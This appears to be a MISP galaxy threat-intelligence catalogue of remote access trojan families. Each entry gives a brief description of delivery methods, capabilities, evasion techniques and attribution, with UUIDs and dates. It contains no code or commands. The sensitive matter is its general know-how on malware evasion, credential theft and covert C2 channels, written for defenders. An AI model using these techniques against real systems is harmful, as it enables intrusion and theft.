Quaverse RAT or QRAT is a fairly new Remote Access Tool (RAT) introduced in May 2015. This RAT is marketed as an undetectable Java RAT. As you might expect from a RAT, the tool is capable of grabbing passwords, key logging and browsing files on the victim's computer. On a regular basis for the past several months, we have observed the inclusion of QRAT in a number of spam campaigns.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Quaverse.

Known Synonyms
QRAT
Internal MISP references

UUID 3d7cbe3f-ba90-46f7-89a2-21aa52871404 which can be used as unique global reference for Quaverse in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015

Heseber

Internal MISP references

UUID 69d1f7e0-d7df-4e86-bec5-b7df696c5bcf which can be used as unique global reference for Heseber in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2015

Cardinal

Cardinal is a remote access trojan (RAT) discovered by Palo Alto Networks in 2017 and has been active for over two years. It is delivered via a downloader, known as Carp, and uses malicious macros in Microsoft Excel documents to compile embedded C# programming language source code into an executable that runs and deploys the Cardinal RAT. The malicious Excel files use different tactics to get the victims to execute it.

Internal MISP references

UUID cb23f563-a8b9-4427-9884-594e8d3cc836 which can be used as unique global reference for Cardinal in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

OmniRAT

Works on all Android, Windows, Linux and Mac devices!

Internal MISP references

UUID f091dfcb-07f4-4414-849e-c644e7327d94 which can be used as unique global reference for OmniRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

Jfect

Internal MISP references

UUID 10193e70-8bb7-4e48-b8f0-7692f2052c89 which can be used as unique global reference for Jfect in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015

Trochilus

Trochilus is a remote access trojan (RAT) first identified in October 2015 when attackers used it to infect visitors of a Myanmar website. It was then used in a 2016 cyber-espionage campaign, dubbed "the Seven Pointed Dagger," managed by another group, "Group 27," who also uses the PlugX trojan. Trochilus is primarily spread via emails with a malicious .RAR attachment containing the malware. The trojan's functionality includes a shellcode extension, remote uninstall, a file manager, and the ability to download and execute, upload and execute, and access the system information. Once present on a system, Trochilus can move laterally in the network for better access. This trojan operates in memory only and does not write to the disk, helping it evade detection.

Internal MISP references

UUID 8204723f-aefc-4c90-9178-8fe53e8d6f33 which can be used as unique global reference for Trochilus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

Matryoshka

Their most commonly used initial attack vector is a simple, yet alarmingly effective, spearphishing attack, infecting unsuspecting victims via a malicious email attachment (usually an executable that has been disguised as something else). From there, Matryoshka runs second stage malware via a dropper and covertly installs a Remote Access Toolkit (RAT). This is done using a reflective loader technique that allows the malware to run in process memory, rather than being written to disk. This not only hides the install of the RAT but also ensures that the RAT will be ‘reinstalled’ after system restart.

Internal MISP references

UUID 33b86249-5455-4698-a5e5-0c9591e673b9 which can be used as unique global reference for Matryoshka in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2015
Related clusters

To see the related clusters, click here.

Mangit

First discovered by Trend Micro in June, Mangit is a new malware family being marketed on both the Dark web and open internet. Users have the option to rent the trojan's infrastructure for about $600 per 10-day period or buy the source code for about $8,800. Mangit was allegedly developed by "Ric", a Brazilian hacker, who makes himself available via Skype to discuss rental agreements. Once the malware is rented or purchased, the user controls a portion of the Mangit botnet, the trojan, the dropper, an auto-update system, and the server infrastructure to run their attacks. Mangit contains support for nine Brazillian banks including Citibank, HSBC, and Santander. The malware can also be used to steal user PayPal credentials. Mangit has the capability to collect banking credentials, receive SMS texts when a victim is accessing their bank account, and take over victim's browsers. To circumvent two-factor authentication, attackers can use Mangit to lock victim's browsers and push pop-ups to the victim asking for the verification code they just received.

Internal MISP references

UUID 05ecfb96-f9ec-4dab-b7d3-86b8cb3fe7b5 which can be used as unique global reference for Mangit in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

LeGeNd

Internal MISP references

UUID 20336460-828e-4f18-bbe6-14f3579b5f5a which can be used as unique global reference for LeGeNd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

Revenge-RAT

Revenge v0.1 was a simple tool, according to a researcher known as Rui, who says the malware’s author didn’t bother obfuscating the RAT’s source code. This raised a question mark with the researchers, who couldn’t explain why VirusTotal scanners couldn’t pick it up as a threat right away.Revenge, which was written in Visual Basic, also didn’t feature too many working features, compared to similar RATs. Even Napolean admitted that his tool was still in the early development stages, a reason why he provided the RAT for free.

Internal MISP references

UUID 80c94c22-b294-4622-8934-e89a235d586f which can be used as unique global reference for Revenge-RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

vjw0rm 0.1

“Vengeance Justice Worm” was first discovered in 2016 and is a highly multifunctional, modular, publicly available “commodity malware”, i.e., it can be purchased by those interested through various cybercrime and hacking related forums and channels.

VJwOrm is a JavaScript-based malware and combines characteristics of Worm, Information Stealer, Remote-Access Trojan (RAT), Denial-of-Service (DOS) malware, and spam-bot.

VJw0rm is propagated primarily by malicious email attachments and by infecting removeable storage devices.

Once executed by the victim, the very heavily obfuscated VJw0rm will enumerate installed drives and, if a removeable drive is found, VJwOrm will infect it if configured to do so.

It will continue to gather victim information such as operating system details, user’s details, installed anti-virus product details, stored browser cookies, the presence of vbc.exe on the system (Microsoft’s .NET Visual Basic Compiler, this indicates that .NET is installed on the system and can affect the actor’s choice of additional malware delivery), and whether the system has been previously infected.

VJw0rm will then report this information back to its command-and-control server and await further commands, such as downloading and executing additional malware or employing any of its other numerous capabilities.

Finally, VJw0rm establishes persistency in the form of registry auto-runs, system startup folders, a scheduled-task, or any combination of these methods.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular vjw0rm 0.1.

Known Synonyms
VJw0rm
VJwOrm
Vengeance Justice Worm
Internal MISP references

UUID bf86d7a6-80af-4d22-a092-f822bf7201d2 which can be used as unique global reference for vjw0rm 0.1 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

rokrat

ROKRAT is a remote access trojan (RAT) that leverages a malicious Hangual Word Processor (HWP) document sent in spearphishing emails to infect hosts. The HWP document contains an embedded Encapsulated PostScript (EPS) object. The object exploits an EPS buffer overflow vulnerability and downloads a binary disguised as a .JPG file. The file is then decoded and the ROKRAT executable is initiated. The trojan uses legitimate Twitter, Yandex, and Mediafire websites for its command and control communications and exfiltration platforms, making them difficult to block globally. Additionally, the platforms use HTTPS connections, making it more difficult to gather additional data on its activities. Cisco's Talos Group identified two email campaigns. In one, attackers send potential victims emails from an email server of a private university in Seoul, South Korea with a sender email address of "kgf2016@yonsei.ac.kr," the contact email for the Korea Global Forum, adding a sense of legitimacy to the email. It is likely that the email address was compromised and used by the attackers in this campaign. The second is less sophisticated and sends emails claiming to be from a free Korean mail service with a the subject line, "Request Help" and attached malicious HWP filename, "I'm a munchon person in Gangwon-do, North Korea." The ROKRAT developer uses several techniques to hinder analysis, including identifying tools usually used by malware analysts or within sandbox environments. Once it has infected a device, this trojan can execute commands, move a file, remove a file, kill a process, download and execute a file, upload documents, capture screenshots, and log keystrokes. Researchers believe the developer is a native Korean speaker and the campaign is currently targeting Korean-speakers.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular rokrat.

Known Synonyms
ROKRAT
Internal MISP references

UUID 38e68703-1db4-4b97-80e9-a0afd099da58 which can be used as unique global reference for rokrat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

Qarallax

Travelers applying for a US Visa in Switzerland were recently targeted by cyber-criminals linked to a malware called QRAT. Twitter user @hkashfi posted a Tweet saying that one of his friends received a file (US Travel Docs Information.jar) from someone posing as USTRAVELDOCS.COM support personnel using the Skype account ustravelidocs-switzerland (notice the “i” between “travel” and “docs”).

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Qarallax.

Known Synonyms
qrat
Internal MISP references

UUID 179288c9-4ff1-4a7e-b728-35dd2e6aac43 which can be used as unique global reference for Qarallax in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters

To see the related clusters, click here.

MoonWind

MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand.

Internal MISP references

UUID f266754c-d0aa-4918-95a3-73b28eaa66e3 which can be used as unique global reference for MoonWind in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters

To see the related clusters, click here.

Remcos

Remcos is another RAT (Remote Administration Tool) that was first discovered being sold in hacking forums in the second half of 2016. Since then, it has been updated with more features, and just recently, we’ve seen its payload being distributed in the wild for the first time.

Internal MISP references

UUID f647cca0-7416-47e9-8342-94b84dd436cc which can be used as unique global reference for Remcos in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters

To see the related clusters, click here.

Client Maximus

The purpose of the Client Maximus malware is financial fraud. As such, its code aspires to create the capabilities that most banking Trojans have, which allow attackers to monitor victims’ web navigation and interrupt online banking session at will. After taking over a victim’s banking session, an attacker operating this malware can initiate a fraudulent transaction from the account and use social engineering screens to manipulate the unwitting victim into authorizing it.

Internal MISP references

UUID d840e5af-3e6b-49af-ab82-fb4f8740bf55 which can be used as unique global reference for Client Maximus in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters

To see the related clusters, click here.

TheFat RAT

Thefatrat a massive exploiting tool revealed >> An easy tool to generate backdoor and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malware can be execute on windows, android, mac . The malware that created with this tool also have an ability to bypass most…

Internal MISP references

UUID 90b4addc-e9ff-412d-899e-7204c89c0bdb which can be used as unique global reference for TheFat RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016

RedLeaves

Since around October 2016, JPCERT/CC has been confirming information leakage and other damages caused by malware ‘RedLeaves’. It is a new type of malware which has been observed since 2016 in attachments to targeted emails.

Internal MISP references

UUID ad6a1b4a-6d79-40d4-adb7-1d7ca697347e which can be used as unique global reference for RedLeaves in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2016
Related clusters

To see the related clusters, click here.

Rurktar

Dubbed Rurktar, the tool hasn’t had all of its functionality implemented yet, but G DATA says “it is relatively safe to say [it] is intended for use in targeted spying operations.” The malicious program could be used for reconnaissance operations, as well as to spy on infected computers users, and steal or upload files.

Internal MISP references

UUID 40bce827-4049-46e4-8323-3ab58f0f00bc which can be used as unique global reference for Rurktar in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017
Related clusters

To see the related clusters, click here.

RATAttack

RATAttack is a remote access trojan (RAT) that uses the Telegram protocol to support encrypted communication between the victim's machine and the attacker. The Telegram protocol also provides a simple method to communicate to the target, negating the need for port forwarding. Before using RATAttack, the attacker must create a Telegram bot and embed the bot's Telegram token into the trojan's configuration file. When a system is infected with RATAttack, it connects to the bot's Telegram channel. The attacker can then connect to the same channel and manage the RATAttack clients on the infected host machines. The trojan's code was available on GitHub then was taken down by the author on April 19, 2017.

Internal MISP references

UUID 2384b62d-312f-43e2-ab47-68c9fcca1541 which can be used as unique global reference for RATAttack in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

KhRAT

So called because the Command and Control (C2) infrastructure from previous variants of the malware was located in Cambodia, as discussed by Roland Dela Paz at Forecpoint here, KHRAT is a Trojan that registers victims using their infected machine’s username, system language and local IP address. KHRAT provides the threat actors typical RAT features and access to the victim system, including keylogging, screenshot capabilities, remote shell access and so on.

Internal MISP references

UUID 9da7b7b2-f514-4114-83c0-ce3a5f635d2e which can be used as unique global reference for KhRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

RevCode

Internal MISP references

UUID 5a3463d3-ff2a-41e2-9186-55da8c88b349 which can be used as unique global reference for RevCode in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

AhNyth Android

Android Remote Administration Tool

Internal MISP references

UUID b1df2bb1-7fd4-4a25-93c3-fe1f2c7cf529 which can be used as unique global reference for AhNyth Android in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

Socket23

SOCKET23 was launched from his web site and immedi- ately infected major French corporations between August and October 1998. The virus (distributing the Trojan) was known as W32/HLLP.DeTroie.A (alias W32/Cheval.TCV). Never had a virus so disrupted French industry. The author quickly offered his own remover and made his apologies on his web site (now suppressed). Jean-Christophe X (18) was arrested on Tuesday 15 June 1999 in the Paris area and placed under judicial investigation for ‘fraudulent intrusion of data in a data processing system, suppression and fraudulent modification of data’

Internal MISP references

UUID da7c818f-5f3b-415c-b885-cf0a71d6e89e which can be used as unique global reference for Socket23 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 1998

PowerRAT

Internal MISP references

UUID b3620451-8871-4078-bbf9-aa5bab641299 which can be used as unique global reference for PowerRAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2017

MacSpy

Standard macOS backdoor, offered via a 'malware-as-a-service' model. MacSpy is advertised as the "most sophisticated Mac spyware ever", with the low starting price of free. While the idea of malware-as-a-service (MaaS) isn’t a new one with players such as Tox and Shark the game, it can be said that MacSpy is one of the first seen for the OS X platform.

Internal MISP references

UUID b7cea5fe-d3fe-47cf-ba82-104c90e130ff which can be used as unique global reference for MacSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017
Related clusters

To see the related clusters, click here.

DNSMessenger

Talos recently analyzed an interesting malware sample that made use of DNS TXT record queries and responses to create a bidirectional Command and Control (C2) channel. This allows the attacker to use DNS communications to submit new commands to be run on infected machines and return the results of the command execution to the attacker. This is an extremely uncommon and evasive way of administering a RAT. The use of multiple stages of Powershell with various stages being completely fileless indicates an attacker who has taken significant measures to avoid detection.

Internal MISP references

UUID ee8ccb36-2596-43a3-a044-b8721dbeb2ab which can be used as unique global reference for DNSMessenger in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017
Related clusters

To see the related clusters, click here.

PentagonRAT

Internal MISP references

UUID d208daa3-6ecd-4faf-8492-04f7b5b2dd28 which can be used as unique global reference for PentagonRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

NewCore

NewCore is a remote access trojan first discovered by Fortinet researchers while conducting analysis on a China-linked APT campaign targeting Vietnamese organizations. The trojan is a DLL file, executed after a trojan downloader is installed on the targeted machine. Based on strings in the code, the trojan may be compiled from the publicly-available source code of the PcClient and PcCortr backdoor trojans.

Internal MISP references

UUID 6a505bfc-87fe-4bd2-97d7-394a3c29611d which can be used as unique global reference for NewCore in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2017

Deeper RAT

Internal MISP references

UUID d7739c15-07af-4cfd-9eea-a28ed90cbfa5 which can be used as unique global reference for Deeper RAT in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2010

Xyligan

Internal MISP references

UUID 0a75f34a-eaca-4ed8-b2f2-3f713c7a0693 which can be used as unique global reference for Xyligan in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2012

H-w0rm

Internal MISP references

UUID ca6e2e9b-6b5a-447b-9561-295c807a6484 which can be used as unique global reference for H-w0rm in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
date 2013

htpRAT

On November 8, 2016 a non-disclosed entity in Laos was spear-phished by a group closely related to known Chinese adversaries and most likely affiliated with the Chinese government. The attackers utilized a new kind of Remote Access Trojan (RAT) that has not been previously observed or reported. The new RAT extends the capabilities of traditional RATs by providing complete remote execution of custom commands and programming. htpRAT, uncovered by RiskIQ cyber investigators, is the newest weapon in the Chinese adversary’s arsenal in a campaign against Association of Southeast Asian Nations (ASEAN). Most RATs can log keystrokes, take screenshots, record audio and video from a webcam or microphone, install and uninstall programs and manage files. They support a fixed set of commands operators can execute using different command IDs —’file download’ or ‘file upload,’ for example—and must be completely rebuilt to have different functionality. htpRAT, on the other hand, serves as a conduit for operators to do their job with greater precision and effect. On the Command and Control (C2) server side, threat actors can build new functionality in commands, which can be sent to the malware to execute. This capability makes htpRAT a small, agile, and incredibly dynamic piece of malware. Operators can change functionality, such as searching for a different file on the victim’s network, simply by wrapping commands.

Internal MISP references

UUID 7362581a-a7d1-4060-b225-e227f2df2b60 which can be used as unique global reference for htpRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

FALLCHILL

According to trusted third-party reporting, HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace, telecommunications, and finance industries. The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies. FALLCHILL typically infects a system as a file dropped by other HIDDEN COBRA malware or as a file downloaded unknowingly by users when visiting sites compromised by HIDDEN COBRA actors. HIDDEN COBRA actors use an external tool or dropper to install the FALLCHILL malware-as-a-service to establish persistence. Because of this, additional HIDDEN COBRA malware may be present on systems compromised with FALLCHILL.

Internal MISP references

UUID e0bea149-2def-484f-b658-f782a4f94815 which can be used as unique global reference for FALLCHILL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

UBoatRAT

Alto Networks Unit 42 has identified attacks with a new custom Remote Access Trojan (RAT) called UBoatRAT. The initial version of the RAT, found in May of 2017, was simple HTTP backdoor that uses a public blog service in Hong Kong and a compromised web server in Japan for command and control. The developer soon added various new features to the code and released an updated version in June. The attacks with the latest variants we found in September have following characteristics. Targets personnel or organizations related to South Korea or video games industry Distributes malware through Google Drive Obtains C2 address from GitHub Uses Microsoft Windows Background Intelligent Transfer Service(BITS) to maintain persistence.

Internal MISP references

UUID 03694200-80c2-433d-9797-09eafcad1075 which can be used as unique global reference for UBoatRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

CrossRat

The EFF/Lookout report describes CrossRat as a “newly discovered desktop surveillanceware tool…which is able to target Windows, OSX, and Linux.”

Internal MISP references

UUID 696125b9-7a91-463a-9e6b-b4fc381b8833 which can be used as unique global reference for CrossRat in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

TSCookieRAT

TSCookie provides parameters such as C&C server information when loading TSCookieRAT. Upon the execution, information of the infected host is sent with HTTP POST request to an external server. (The HTTP header format is the same as TSCookie.) The data is RC4-encrypted from the beginning to 0x14 (the key is Date header value), which is followed by the information of the infected host (host name, user name, OS version, etc.). Please refer to Appendix C, Table C-1 for the data format.

Internal MISP references

UUID 7b107b46-4eca-11e8-b89f-0366ae765ddd which can be used as unique global reference for TSCookieRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Coldroot

Coldroot, a remote access trojan (RAT), is still undetectable by most antivirus engines, despite being uploaded and freely available on GitHub for almost two years. The RAT appears to have been created as a joke, "to Play with Mac users," and "give Mac it's rights in this [the RAT] field," but has since expanded to work all three major desktop operating systems — Linux, macOS, and Windows— according to a screenshot of its builder extracted from a promotional YouTube video.

Internal MISP references

UUID 86f1f048-4eca-11e8-a08e-7708666ace6e which can be used as unique global reference for Coldroot in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Comnie

Comnie is a RAT originally identified by Sophos. It has been using Github, Tumbler and Blogspot as covert channels for its C2 communications. Comnie has been observed targetting government, defense, aerospace, high-tech and telecommunication sectors in Asia.

Internal MISP references

UUID d14806fe-4ecb-11e8-a120-ff726de6a4d3 which can be used as unique global reference for Comnie in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

GravityRAT

GravityRAT has been under ongoing development for at least 18 months, during which the developer has implemented new features. We've seen file exfiltration, remote command execution capability and anti-vm techniques added throughout the life of GravityRAT. This consistent evolution beyond standard remote code execution is concerning because it shows determination and innovation by the actor.

Internal MISP references

UUID 2d356870-4ecd-11e8-9bb8-e3ba5aa7da31 which can be used as unique global reference for GravityRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

ARS VBS Loader

ARS VBS Loader not only downloads and executes malicious code, but also includes a command and control application written in PHP that allows a botmaster to issue commands to a victim's machine. This behavior likens ARS VBS Loader to a remote access Trojan (RAT), giving it behavior and capabilities rarely seen in malicious "loaders".

Internal MISP references

UUID cd6527d1-17a7-4825-8b4b-56e113d0efb1 which can be used as unique global reference for ARS VBS Loader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

RadRAT

RadRAT, its capabilities include: unfettered control of the compromised computer, lateral movement across the organization (Mimikatz-like credentials harvesting, NTLM hash harvesting from the Windows registry and implementation of the Pass-the-Hash attack on SMB connections) and rootkit-like detection-evasion mechanisms.

Internal MISP references

UUID 5a3df9d7-82de-445e-a218-406b970600d7 which can be used as unique global reference for RadRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

FlawedAmmyy

FlawedAmmyy, has been used since the beginning of 2016 in both highly targeted email attacks as well as massive, multi-million message campaigns. The RAT is based on leaked source code for Version 3 of the Ammyy Admin remote desktop software. As such FlawedAmmyy contains the functionality of the leaked version, including: Remote Desktop control, File system manager, Proxy support, Audio Chat.

Internal MISP references

UUID 3c1003a2-8364-467a-b9b8-fcc19724a9b5 which can be used as unique global reference for FlawedAmmyy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

Spymaster Pro

Monitoring Software

Internal MISP references

UUID e9f9d900-4f9a-11e8-bce9-4bfbb0e9ab4c which can be used as unique global reference for Spymaster Pro in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Classic RAT that can download, upload, execute commands on the victim host and perform keylogging. However, the command and control (C2) infrastructure is very specific. It uses the legitimate Naver email platform in order to communicate with the attackers via email

Internal MISP references

UUID 6ea032a0-d54a-463b-b016-2b7b9b9a5b7e which can be used as unique global reference for NavRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

joanap

Joanap is a two-stage malware used to establish peer-to-peer communications and to manage botnets designed to enable other operations. Joanap malware provides HIDDEN COBRA actors with the ability to exfiltrate data, drop and run secondary payloads, and initialize proxy communications on a compromised Windows device.

Internal MISP references

UUID caac1aa2-6982-11e8-8107-a331ae3511e7 which can be used as unique global reference for joanap in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Sisfader

Sisfader maintains persistence installing itself as a system service, it is made up of multiple components ([1] Dropper - installing the malware, [2] Agent - main code of the RAT, [3] Config - written to the registry, [4] Auto Loader - responsible for extracting the Agent, the Config from the registry) and it has its own custom protocol for communication.

Internal MISP references

UUID b533439d-b060-4c90-80e0-9dce67b0c6fb which can be used as unique global reference for Sisfader in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

SocketPlayer

The RAT is written in .NET, it uses socket.io for communication. Currently there are two variants of the malware, the 1st variant is a typical downloader whereas the 2nd one has download and C2 functionalities.

Internal MISP references

UUID d9475765-2cea-45c0-b638-a082b9427239 which can be used as unique global reference for SocketPlayer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Hallaj PRO RAT

RAT

Internal MISP references

UUID f6447046-f4e8-4977-9cc3-edee74ff0038 which can be used as unique global reference for Hallaj PRO RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

NukeSped

This threat can install other malware on your PC, including Trojan:Win32/NukeSped.B!dha and Trojan:Win32/NukeSped.C!dha. It can show you a warning message that says your files will be made publically available if you don't follow the malicious hacker's commands.

Internal MISP references

UUID 5d0369ee-c718-11e8-b328-035ed1bdca07 which can be used as unique global reference for NukeSped in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

TheOneSpy

Remotely monitor and control any wrong activity of kids on all smartphones & computers

Internal MISP references

UUID da5feaef-d96f-46e2-aad7-bd2745801048 which can be used as unique global reference for TheOneSpy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

BONDUPDATER

BONDUPDATER is a PowerShell-based Trojan first discovered by FireEye in mid-November 2017, when OilRig targeted a different Middle Eastern governmental organization. The BONDUPDATER Trojan contains basic backdoor functionality, allowing threat actors to upload and download files, as well as the ability to execute commands. BONDUPDATER, like other OilRig tools, uses DNS tunneling to communicate with its C2 server. During the past month, Unit 42 observed several attacks against a Middle Eastern government leveraging an updated version of the BONDUPDATER malware, which now includes the ability to use TXT records within its DNS tunneling protocol for its C2 communications.

Internal MISP references

UUID ef9f1592-0186-4f5d-a8ea-6c10450d2219 which can be used as unique global reference for BONDUPDATER in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

FlawedGrace

Proofpoint also point out that FlawedGrace is a full-featured RAT written in C++ and that it is a very large program that "extensive use of object-oriented and multithreaded programming techniques. "As a consequence, getting familiar with its internal structure takes a lot of time and is far from a simple task.

Internal MISP references

UUID 428c8288-6f65-453f-bfa2-4b519d08f8e9 which can be used as unique global reference for FlawedGrace in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

H-worm

H-worm is a VBS (Visual Basic Script) based RAT written by an individual going by the name Houdini. We believe the author is based in Algeria and has connections to njq8, the author of njw0rm [1] and njRAT/LV [2] through means of a shared or common code base. We have seen the H-worm RAT being employed in targeted attacks against the international energy industry; however, we also see it being employed in a wider context as run of the mill attacks through spammed email attachments and malicious links.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular H-worm.

Known Synonyms
Dunihi
Houdini
WSHRat
Internal MISP references

UUID 1b6a067b-50b9-4aa7-a49b-823e94e210fe which can be used as unique global reference for H-worm in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
Related clusters

To see the related clusters, click here.

Parasite-HTTP-RAT

The RAT, dubbed Parasite HTTP, is especially notable for the extensive array of techniques it incorporates for sandbox detection, anti-debugging, anti-emulation, and other protections. The malware is also modular in nature, allowing actors to add new capabilities as they become available or download additional modules post infection.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Parasite-HTTP-RAT.

Known Synonyms
Parasite HTTP
Internal MISP references

UUID 1b6a067c-50ba-4aa7-a59b-824e94e210fe which can be used as unique global reference for Parasite-HTTP-RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Caesar RAT

Caesar is an HTTP-based RAT that allows you to remotely control devices directly from your browser.

Internal MISP references

UUID 1b6a066c-50ba-4aa6-a49b-823e94e110fe which can be used as unique global reference for Caesar RAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

FlawedAmmy

During the month of October, Check Point researchers discovered a widespread malware campaign spreading a remote access trojan (dubbed “FlawedAmmy”) that allows attackers to take over victims’ computers and data. The campaign was the latest and most widespread delivering the ‘FlawedAmmyy’ RAT, following a number of campaigns that have spread this malware in recent months. The Trojan allows attackers to gain full access to the machine’s camera and microphone, collect screen grabs, steal credentials and sensitive files, and intrusively monitor the victims’ actions. As a result, FlawedAmmy is the first RAT to enter the Global Threat Index’s top 10 ranking.

Internal MISP references

UUID 4b9b99f0-9c2d-4db5-aaff-09de88509c04 which can be used as unique global reference for FlawedAmmy in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Felipe

The Zscaler ThreatLabZ team came across a new strain of infostealer Trojan called Felipe, which silently installs itself onto a user’s system and connects to a command-and-control (C&C) server to send system information from the compromised system. This malware is compiled for both 32-bit and 64-bit Windows operating systems. Felipe basically steals the victim's debit and credit card information and sends it, along with other personal information, to the remote C&C server. It also sets a date and time to perform other malicious activity upon successful infection of the victim machine.

Internal MISP references

UUID 0f117f50-9657-11e9-8e2b-83e391e0ce57 which can be used as unique global reference for Felipe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Amavaldo Banking Trojan

Amavaldo is banking trojan writen in Delphi and known to targeting Spanish or Portuguese speaking countries. It contains backdoor functionality and can work as multi stage. Amavaldo also abuses legitimate tools and softwares

Internal MISP references

UUID 39c65b1d-7799-43d6-a963-4a058b1c756e which can be used as unique global reference for Amavaldo Banking Trojan in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
date 2019

AsyncRAT

Open-Source Remote Administration Tool For Windows C# (RAT)

Internal MISP references

UUID 1b6a065c-40ba-4aa5-a46b-813e74e010fe which can be used as unique global reference for AsyncRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

InnfiRAT

new RAT called InnfiRAT, which is written in .NET and designed to perform specific tasks from an infected machine

Internal MISP references

UUID 1b4a085c-30bb-5aa5-b46a-803e94e010ff which can be used as unique global reference for InnfiRAT in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

KeyBase

In the wild since February 2015. The malware comes equipped with a variety of features and can be purchased for $50 directly from the author. It has been deployed in attacks against organizations across many industries and is predominantly delivered via phishing emails.

Internal MISP references

UUID b3cfd21f-b637-42ff-b118-2803630b718a which can be used as unique global reference for KeyBase in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

Warzone

Apparently existing since 2018

Internal MISP references

UUID bbff39cb-a12b-4b18-be20-aa9e6d378fa6 which can be used as unique global reference for Warzone in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value

SDBbot

